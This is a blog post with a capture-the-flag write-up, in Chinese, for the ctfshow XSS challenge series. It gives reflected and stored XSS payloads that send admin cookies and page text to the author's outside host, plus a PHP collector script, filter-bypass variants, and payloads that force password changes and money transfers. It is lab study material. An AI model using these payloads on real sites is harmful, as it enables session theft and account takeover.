<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>ctfshow xss | BkingXD</title><meta name="keywords" content="web,ctfshow"><meta name="author" content="BkingXD"><meta name="copyright" content="BkingXD"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="ctfshow web入门XSS篇的WP。">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow xss">
<meta property="og:url" content="https://bkingxd.github.io/2022/01/11/ctfshow%20WEBXSS/index.html">
<meta property="og:site_name" content="BkingXD">
<meta property="og:description" content="ctfshow web入门XSS篇的WP。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png">
<meta property="article:published_time" content="2022-01-11T05:18:06.000Z">
<meta property="article:modified_time" content="2024-03-01T07:31:12.712Z">
<meta property="article:author" content="BkingXD">
<meta property="article:tag" content="web">
<meta property="article:tag" content="ctfshow">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png"><link rel="shortcut icon" href="/img/578879781.png"><link rel="canonical" href="https://bkingxd.github.io/2022/01/11/ctfshow%20WEBXSS/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'ctfshow xss',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2024-03-01 15:31:12'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="BkingXD" type="application/atom+xml">
</head><body><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">Loading...</div></div></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/578879781.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">35</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">22</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">4</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BkingXD</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">ctfshow xss</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2022-01-11T05:18:06.000Z" title="Created 2022-01-11 13:18:06">2022-01-11</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2024-03-01T07:31:12.712Z" title="Updated 2024-03-01 15:31:12">2024-03-01</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/CTF/">CTF</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">Word count:</span><span class="word-count">1.2k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">Reading time:</span><span>4min</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="ctfshow xss"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h1><h2 id="web316"><a href="#web316" class="headerlink" title="web316"></a>web316</h2><p>打开，如图所示，反射性xss，我们尝试输入一段js，<code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></p>
<p><img src="https://raw.githubusercontent.com/BkingXD/CTF-Web-/main/images/image-20211021201504331.png" alt="image-20211021201504331"></p>
<p>弹出窗口，我们不是admin，没有flag</p>
<p><img src="https://raw.githubusercontent.com/BkingXD/CTF-Web-/main/images/image-20211021201558629.png" alt="image-20211021201558629"></p>
<p>因为这里cookie是我们自己的，如果想要admin，就需要服务器自己运行这串代码(这里靶机的bot每隔一段时间访问输入的内容，模拟了反射型XSS)，所以我们可以构造js：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="built_in">document</span>.location.href=<span class="string">&#x27;https://e62538571f.imdo.co/king/x.php?1=&#x27;</span>+<span class="built_in">document</span>.cookie&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>这里当服务器访问到输入内容，js运行，跳转到我们的服务器上指定的文件，并执行将cookie信息留下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">x.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$content</span>=<span class="variable">$_GET</span>[<span class="number">1</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$content</span>))&#123;</span><br><span class="line">    file_put_contents(<span class="string">&#x27;./flag.txt&#x27;</span>,<span class="variable">$content</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;no data&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="web317"><a href="#web317" class="headerlink" title="web317"></a>web317</h2><p>加了过滤，测试一下，把script关键词过滤了，换一种写法</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body onload=<span class="string">&quot;document.location.href=&#x27;https://e62538571f.imdo.co/king/x.php?1=&#x27;+document.cookie&quot;</span>&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<h2 id="web318"><a href="#web318" class="headerlink" title="web318"></a>web318</h2><p>又增加了过滤，img被过滤了，但上一题payload还能用，我们略换一下写法</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body/onload=<span class="string">&quot;document.location.href=&#x27;https://e62538571f.imdo.co/king/x.php?1=&#x27;+document.cookie&quot;</span>&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<h2 id="web319"><a href="#web319" class="headerlink" title="web319"></a>web319</h2><p>继续增加过滤，payload仍可以继续用。</p>
<h2 id="web320"><a href="#web320" class="headerlink" title="web320"></a>web320</h2><p>多过滤了空格，我们多换一下写法</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body<span class="comment">/**/</span>onload=<span class="string">&quot;document.location.href=&#x27;https://e62538571f.imdo.co/king/x.php?1=&#x27;+document.cookie&quot;</span>&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<h2 id="web321"><a href="#web321" class="headerlink" title="web321"></a>web321</h2><p>tab键替换空格，payload：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body%09onload=<span class="string">&quot;document.location.href=&#x27;https://e62538571f.imdo.co/king/x.php?1=&#x27;+document.cookie&quot;</span>&gt;&lt;/body&gt;</span><br></pre></td></tr></table></figure>

<h2 id="web322"><a href="#web322" class="headerlink" title="web322"></a>web322</h2><p>用上题payload即可</p>
<h2 id="web323"><a href="#web323" class="headerlink" title="web323"></a>web323</h2><p>多过滤了iframe，payload还可继续用</p>
<h2 id="web324"><a href="#web324" class="headerlink" title="web324"></a>web324</h2><p>继续用之前的payload</p>
<h2 id="web325"><a href="#web325" class="headerlink" title="web325"></a>web325</h2><p>继续用之前的payload</p>
<h2 id="web326"><a href="#web326" class="headerlink" title="web326"></a>web326</h2><p>继续用之前的payload</p>
<h2 id="web327"><a href="#web327" class="headerlink" title="web327"></a>web327</h2><p>题目变为存储型xss，如图所示，发送一封邮件</p>
<p><img src="https://raw.githubusercontent.com/BkingXD/CTF-Web-/main/images/image-20221109151802902.png" alt="image-20221109151802902"></p>
<p>目标就是发送给admin，内容就是我们构造的恶意js，当admin收到邮件并查看，就会触发内容中的js，相较于反射型的xss，恶意代码是已经存储在服务器上，就比如邮件，用户可以多次访问，每次访问都会触发代码。</p>
<h2 id="web328"><a href="#web328" class="headerlink" title="web328"></a>web328</h2><p>打开靶机，发现一个登录注册和用户管理：</p>
<p><img src="https://raw.githubusercontent.com/BkingXD/CTF-Web-/main/images/image-20221110200454856.png" alt="image-20221110200454856"></p>
<p>我们看到用户管理的信息都是不可见的，而admin是可以看见的，这时候就想到，如果信息中存在XSS代码，当admin访问这个页面时就会执行，我们就能拿到admin访问时的信息，或者拿到admin的cookie进行身份伪造，</p>
<p>注册下面的账户，拿到admin的cookie</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username：123</span><br><span class="line">password：&lt;script&gt;document.location.href&#x3D;&#39;https:&#x2F;&#x2F;e62538571f.imdo.co&#x2F;king&#x2F;x.php?1&#x3D;&#39;+document.cookie&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p>替换cookie的PHPSESSID，因为用户信息是js异步获取，抓第二个包才有信息</p>
<p><img src="https://raw.githubusercontent.com/BkingXD/CTF-Web-/main/images/image-20221110203128608.png" alt="image-20221110203128608"></p>
<h2 id="web329"><a href="#web329" class="headerlink" title="web329"></a>web329</h2><p>还是跟上题一样的靶机，先试试上题的方法能不能用了，然后发现替换cookie，不再是admin的身份，那只有可能是cookie失效了(admin在访问完用户管理页面就登出)，不能替换cookie，那就直接获取admin得到的页面信息，我们构造下面的payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username：123</span><br><span class="line">password：&lt;script&gt;document.location.href&#x3D;&#39;https:&#x2F;&#x2F;e62538571f.imdo.co&#x2F;king&#x2F;x.php?1&#x3D;&#39;+document.body.outerText&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<p>直接能获取到信息，里面还有admin的密码：ctfshowdacaiji</p>
<h2 id="web330"><a href="#web330" class="headerlink" title="web330"></a>web330</h2><p><strong>法一：</strong></p>
<p>XSS代码在密码中不能执行了，我们放到用户名中即可，payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username：&lt;script&gt;document.location.href&#x3D;&#39;https:&#x2F;&#x2F;e62538571f.imdo.co&#x2F;king&#x2F;x.php?1&#x3D;&#39;+document.body.outerText&lt;&#x2F;script&gt;</span><br><span class="line">password：123</span><br></pre></td></tr></table></figure>

<p><strong>法二：</strong></p>
<p>发现多了一个修改密码的页面：</p>
<p><img src="https://raw.githubusercontent.com/BkingXD/CTF-Web-/main/images/image-20221110212147939.png" alt="image-20221110212147939"></p>
<p>我们可以抓包得到接口，于是就想到让admin执行修改自己密码的XSS代码，payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username：&lt;script&gt;document.location.href&#x3D;&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;api&#x2F;change.php?p&#x3D;123&lt;&#x2F;script&gt;</span><br><span class="line">password：123</span><br></pre></td></tr></table></figure>

<h2 id="web331"><a href="#web331" class="headerlink" title="web331"></a>web331</h2><p>方法同上一题，但修改密码的请求方式变成POST了，所以法二需要修改payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username：&lt;script&gt;$.ajax(&#123;url:&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;api&#x2F;change.php&#39;,type:&#39;post&#39;,data:&#123;p:&#39;123&#39;&#125;&#125;);&lt;&#x2F;script&gt;</span><br><span class="line">password：123</span><br></pre></td></tr></table></figure>

<h2 id="web332"><a href="#web332" class="headerlink" title="web332"></a>web332</h2><p>靶机内容变了，多了转账汇款和购买flag，flag需要9999，</p>
<p><img src="https://raw.githubusercontent.com/BkingXD/CTF-Web-/main/images/image-20221111144846322.png" alt="image-20221111144846322"></p>
<p>测试发现用户管理那里依然能触发XSS，所以我们可以让admin给我们转钱，payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">username：&lt;script&gt;$.ajax(&#123;url:&#39;http:&#x2F;&#x2F;127.0.0.1&#x2F;api&#x2F;amount.php&#39;,type:&#39;post&#39;,data:&#123;u:&#39;123&#39;,a:9999&#125;&#125;);&lt;&#x2F;script&gt;</span><br><span class="line">password：123</span><br></pre></td></tr></table></figure>

<h2 id="web333"><a href="#web333" class="headerlink" title="web333"></a>web333</h2><p>方法同上一题，存在非预期，可以自己给自己转钱，不会减少只会增加。还有因为每个账号都有5块钱，所以可以写脚本批量注册，然后往一个账号里转钱。</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="https://BkingXD.github.io">BkingXD</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://bkingxd.github.io/2022/01/11/ctfshow%20WEBXSS/">https://bkingxd.github.io/2022/01/11/ctfshow%20WEBXSS/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/ctfshow/">ctfshow</a></div><div class="post_share"><div class="social-share" data-image="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/02/12/ctfshow%20WEB%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"><img class="prev-cover" src="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">ctfshow代码审计</div></div></a></div><div class="next-post pull-right"><a href="/2021/11/17/ctfshow%20WEBSSRF/"><img class="next-cover" src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">ctfshow SSRF</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>Related Articles</span></div><div class="relatedPosts-list"><div><a href="/2021/07/25/ctfshow%20WEB%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/" title="ctfshow信息搜集"><img class="cover" src="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-07-25</div><div class="title">ctfshow信息搜集</div></div></a></div><div><a href="/2021/08/12/ctfshow%20WEB%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="ctfshow文件包含"><img class="cover" src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-08-12</div><div class="title">ctfshow文件包含</div></div></a></div><div><a href="/2021/11/17/ctfshow%20WEBSSRF/" title="ctfshow SSRF"><img class="cover" src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-11-17</div><div class="title">ctfshow SSRF</div></div></a></div><div><a href="/2022/03/02/ctfshow%20WEBSSTI/" title="ctfshow SSTI"><img class="cover" src="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-03-02</div><div class="title">ctfshow SSTI</div></div></a></div><div><a href="/2022/04/22/ctfshow%20WEBXXE/" title="ctfshow XXE"><img class="cover" src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-04-22</div><div class="title">ctfshow XXE</div></div></a></div><div><a href="/2022/02/12/ctfshow%20WEB%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="ctfshow代码审计"><img class="cover" src="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-02-12</div><div class="title">ctfshow代码审计</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/578879781.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">BkingXD</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">35</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">22</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">4</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/BkingXD"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Catalog</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XSS"><span class="toc-number">1.</span> <span class="toc-text">XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#web316"><span class="toc-number">1.1.</span> <span class="toc-text">web316</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web317"><span class="toc-number">1.2.</span> <span class="toc-text">web317</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web318"><span class="toc-number">1.3.</span> <span class="toc-text">web318</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web319"><span class="toc-number">1.4.</span> <span class="toc-text">web319</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web320"><span class="toc-number">1.5.</span> <span class="toc-text">web320</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web321"><span class="toc-number">1.6.</span> <span class="toc-text">web321</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web322"><span class="toc-number">1.7.</span> <span class="toc-text">web322</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web323"><span class="toc-number">1.8.</span> <span class="toc-text">web323</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web324"><span class="toc-number">1.9.</span> <span class="toc-text">web324</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web325"><span class="toc-number">1.10.</span> <span class="toc-text">web325</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web326"><span class="toc-number">1.11.</span> <span class="toc-text">web326</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web327"><span class="toc-number">1.12.</span> <span class="toc-text">web327</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web328"><span class="toc-number">1.13.</span> <span class="toc-text">web328</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web329"><span class="toc-number">1.14.</span> <span class="toc-text">web329</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web330"><span class="toc-number">1.15.</span> <span class="toc-text">web330</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web331"><span class="toc-number">1.16.</span> <span class="toc-text">web331</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web332"><span class="toc-number">1.17.</span> <span class="toc-text">web332</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#web333"><span class="toc-number">1.18.</span> <span class="toc-text">web333</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2023/04/05/ctfshow%20%E6%84%9A%E4%BA%BA%E6%9D%AF(2023)/" title="ctfshow 2023愚人杯"><img src="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="ctfshow 2023愚人杯"/></a><div class="content"><a class="title" href="/2023/04/05/ctfshow%20%E6%84%9A%E4%BA%BA%E6%9D%AF(2023)/" title="ctfshow 2023愚人杯">ctfshow 2023愚人杯</a><time datetime="2023-04-05T12:16:45.000Z" title="Created 2023-04-05 20:16:45">2023-04-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/12/02/HTB-Support/" title="HTB-Support"><img src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HTB-Support"/></a><div class="content"><a class="title" href="/2022/12/02/HTB-Support/" title="HTB-Support">HTB-Support</a><time datetime="2022-12-02T12:16:45.000Z" title="Created 2022-12-02 20:16:45">2022-12-02</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/27/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E2%80%94%E2%80%94CommonCollections1/" title="Java反序列化——CommonCollections1"><img src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Java反序列化——CommonCollections1"/></a><div class="content"><a class="title" href="/2022/11/27/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E2%80%94%E2%80%94CommonCollections1/" title="Java反序列化——CommonCollections1">Java反序列化——CommonCollections1</a><time datetime="2022-11-27T08:32:23.000Z" title="Created 2022-11-27 16:32:23">2022-11-27</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/25/HTB-Shoppy/" title="HTB-Shoppy"><img src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HTB-Shoppy"/></a><div class="content"><a class="title" href="/2022/11/25/HTB-Shoppy/" title="HTB-Shoppy">HTB-Shoppy</a><time datetime="2022-11-25T12:16:45.000Z" title="Created 2022-11-25 20:16:45">2022-11-25</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/18/HTB-RedPanda/" title="HTB-RedPanda"><img src="https://fastly.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="HTB-RedPanda"/></a><div class="content"><a class="title" href="/2022/11/18/HTB-RedPanda/" title="HTB-RedPanda">HTB-RedPanda</a><time datetime="2022-11-18T10:13:25.000Z" title="Created 2022-11-18 18:13:25">2022-11-18</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2024 By BkingXD</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">Hi, welcome to my blog!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark 